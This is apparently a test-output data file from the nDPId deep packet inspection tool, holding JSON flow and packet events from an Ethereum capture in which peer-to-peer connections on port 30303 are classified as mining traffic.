00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFafAqAG4v+qixt0sdl9ft67AAAAAALAC\/\/\/4vwAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGdIHAqAG4NLvPG90tdl\/U+mmAAAAAALAC\/\/8nlgAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+YrAqAG4EopsQ90udl8TbQyrAAAAALAC\/\/\/LAQAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFLLAqAG4EopRHN0vdl8VNVkbAAAAALAC\/\/+X7wAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGvA\/AqAG4WSZjIt0wdl+afwcPAAAAALAC\/\/8MDgAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGH3XAqAG4BQFT4t0xdl\/cLTE7AAAAALAC\/\/8DmAAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAfvAqAG4soDD3N0ydl\/wysJIAAAAALAC\/\/9AcgAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGPejAqAG4Iv8Xcd0zdl8e+UQoAAAAALAC\/\/\/MUAAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGRzjAqAG4A9EtT900dl+bF1VlAAAAALAC\/\/9IRAAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"}
00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1578508364563,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1578508364563,"pkt":"KDc3AG3IEBMx8Tl2CABFAACxV7ZAADERmgVCKlL2wKgBuHZfdl8AnaK0fEIbGBqDvIrgEkHISxvw4daIo1RSAPsaWiRQZnDOwteCpdNuEHAKkf4qhTn951kjq+ta18NQVXgW\/g4PPXuXiV0Qa\/G9UyK1NNATBLMnTaWqYuSaSklfuyWrYJCN+duPAALyy4RPFs69gun3gun3oGE9eACysJzHYDAgc39fUYaAxGcHwJ0T9TM+bdQkH1h\/hF4WIIg="}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1578508364565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364565,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GcyYjnvSXwKgBuHZf3ScG6rxyhP4uMKAScSBDbwAAAgQFrAQCCAo03AK8ItiUTwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1578508364565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364565,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGYC7AqAG4I570l90ndl+E\/i4wBuq8c4AQECzS\/AAAAQEICiLYlHo03AK8"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1578508364566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364566,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDf+ygMPcwKgBuHZf3TL4VGlQ8MrCSaAScSATXAAAAgQFrAQCCApfPQwNItiUTwEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1578508364566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364566,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAgfAqAG4soDD3N0ydl\/wysJJ+FRpUYAQECyi6QAAAQEICiLYlHpfPQwN"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":495,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":546,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1578508364569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364569,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGyBNZJmMiwKgBuHZf3TAEAfQVmn8HEKAScSAQTQAAAgQFrAQCCApfmkPpItiUTwEDAwc="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1578508364569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364569,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvBvAqAG4WSZjIt0wdl+afwcQBAH0FoAQECyf1wAAAQEICiLYlH1fmkPp"}
00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364571,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1578508364593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGVuwi\/xdxwKgBuHZf3TMrXBsGHvlEKaAScSD3ewAAAgQFrAQCCAqnEIc7ItiUTwEDAwc="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1578508364593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPfTAqAG4Iv8Xcd0zdl8e+UQpK1wbB4AQECyG7wAAAQEICiLYlJSnEIc7"}
00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364595,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1578508364565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364565,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GcyYjnvSXwKgBuHZf3ScG6rxyhP4uMKAScSBDbwAAAgQFrAQCCAo03AK8ItiUTwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1578508364565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364565,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGYC7AqAG4I570l90ndl+E\/i4wBuq8c4AQECzS\/AAAAQEICiLYlHo03AK8"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1578508364566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364566,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDf+ygMPcwKgBuHZf3TL4VGlQ8MrCSaAScSATXAAAAgQFrAQCCApfPQwNItiUTwEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1578508364566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364566,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAgfAqAG4soDD3N0ydl\/wysJJ+FRpUYAQECyi6QAAAQEICiLYlHpfPQwN"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":495,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":546,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1578508364569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364569,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGyBNZJmMiwKgBuHZf3TAEAfQVmn8HEKAScSAQTQAAAgQFrAQCCApfmkPpItiUTwEDAwc="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1578508364569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364569,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvBvAqAG4WSZjIt0wdl+afwcQBAH0FoAQECyf1wAAAQEICiLYlH1fmkPp"}
00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364571,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364571,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1578508364593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGVuwi\/xdxwKgBuHZf3TMrXBsGHvlEKaAScSD3ewAAAgQFrAQCCAqnEIc7ItiUTwEDAwc="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1578508364593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPfTAqAG4Iv8Xcd0zdl8e+UQpK1wbB4AQECyG7wAAAQEICiLYlJSnEIc7"}
00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364595,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
01870{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1578508364631,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ9McxAACoRfjA056VswKgBuHZfdl8EKSMV0Tk6zLZQqYdPasDvQYAfjhJ8qeDK0iQF1oC6v4BIFO8Ukv4XviQf8O74kSNp590utu+\/aRkEwwpxoabIrzvIzmTnyJlNpeyfgvNPwLIyg8I+w4LWPa4MA\/W2\/Jap8zB7AAT5A7z5A7T4TYQS26efgnZfgnZfuEAwkgYgUPIi4WiJg+QLzg9wGMhxPAR7azw\/xSKBAPOQbQlR3L69+mdeoxh\/qQi76RfNXeauKXl5ICJHofVK35cH+E2EUt2AH4J2YIJ2YLhAIbpA\/cDFhpXtS\/hixQb3nA9r93xmFVARyWt8mvD62Q42RXQv9d4buwnSPqvoZ8VPM1tV452Mu7b1nW6WCZP3H\/hNhJBbeIeCdl+Cdl+4QHDcQogYDcUZvsmo9wM3ftVwQss5t6Xz7SYpcIe0QCLsJRPOe\/7IMshT7rIUH59Wvzm2VWBMciyHxs11tRtvlg74TYSyPgragnZfgnZfuECktuxNZlsAPCNrxc8drmg5UZJYYlgJcgwixi3d